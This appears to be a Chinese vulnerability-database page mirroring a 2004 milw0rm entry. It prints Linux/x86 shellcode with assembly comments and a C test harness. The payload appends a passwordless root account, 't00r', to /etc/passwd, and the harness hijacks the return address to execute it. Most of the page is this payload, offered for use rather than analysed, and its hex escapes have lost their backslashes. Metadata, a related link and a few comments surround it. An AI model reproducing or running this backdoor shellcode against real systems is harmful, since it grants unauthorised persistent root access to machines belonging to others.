Linux/x86 – Add Root User (t00r) To /etc/passwd Shellcode (82 bytes)
| 漏洞ID | 1054604 | 漏洞类型 | |
| 发布时间 | 2004-09-12 | 更新时间 | 2004-09-12 |
![图片[1]-Linux/x86 – Add Root User (t00r) To /etc/passwd Shellcode (82 bytes)-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-Linux/x86 – Add Root User (t00r) To /etc/passwd Shellcode (82 bytes)-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | Linux_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* [email protected]
* 0x14abril0x7d2
*
* 82 bytes
* Agrega la linea "t00r::0:0::/:/bin/sh" en /etc/passwd
*
* Encriptada en http://www.shellcode.com.ar/linux/lnx-t00r-cr1.c
*
*/
#include <stdio.h>
// Shellcode // Asm Code
char shellcode[]=
"x31xc0" // xorl %eax,%eax
"x50" // pushl %eax
"x68x73x73x77x64" // pushl $0x64777373
"x68x63x2fx70x61" // pushl $0x61702f63
"x68x2fx2fx65x74" // pushl $0x74652f2f
"x89xe3" // movl %esp,%ebx
"x8dx48x02" // leal 0x2(%eax),%ecx
"x8dx40x05" // leal 0x5(%eax),%eax
"xcdx80" // int $0x80
"x89xc3" // movl %eax,%ebx
"x87xca" // xchgl %ecx,%edx
"x31xc9" // xorl %ecx,%ecx
"xb0x13" // movb $0x13,%al
"xcdx80" // int $0x80
"x51" // pushl %ecx
"x68x6ex2fx73x68" // pushl $0x68732f6e
"x68x3ax2fx62x69" // pushl $0x69622f3a
"x68x30x3ax3ax2f" // pushl $0x2f3a3a30
"x68x3ax3ax30x3a" // pushl $0x3a303a3a
"x68x74x30x30x72" // pushl $0x72303074
"x8dx41x04" // leal 0x4(%ecx),%eax
"x89xe1" // movl %esp,%ecx
"xb2x14" // movb $0x14,%dl
"xcdx80" // int $0x80
"x31xc0" // xorl %eax,%eax
"xb0x06" // movb $0x6,%al
"xcdx80" // int $0x80
"x40" // incl %eax
"xcdx80"; // int $0x80
main() {
int *ret;
ret=(int *)&ret+2;
printf("Shellcode lenght=%dn",strlen(shellcode));
(*ret) = (int)shellcode;
}
// milw0rm.com [2004-09-12]相关推荐: Lynx 2.8 Buffer Overflow Vulnerability
Lynx 2.8 Buffer Overflow Vulnerability 漏洞ID 1104970 漏洞类型 Boundary Condition Error 发布时间 1998-05-03 更新时间 1998-05-03 CVE编号 N/A CNNVD-…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666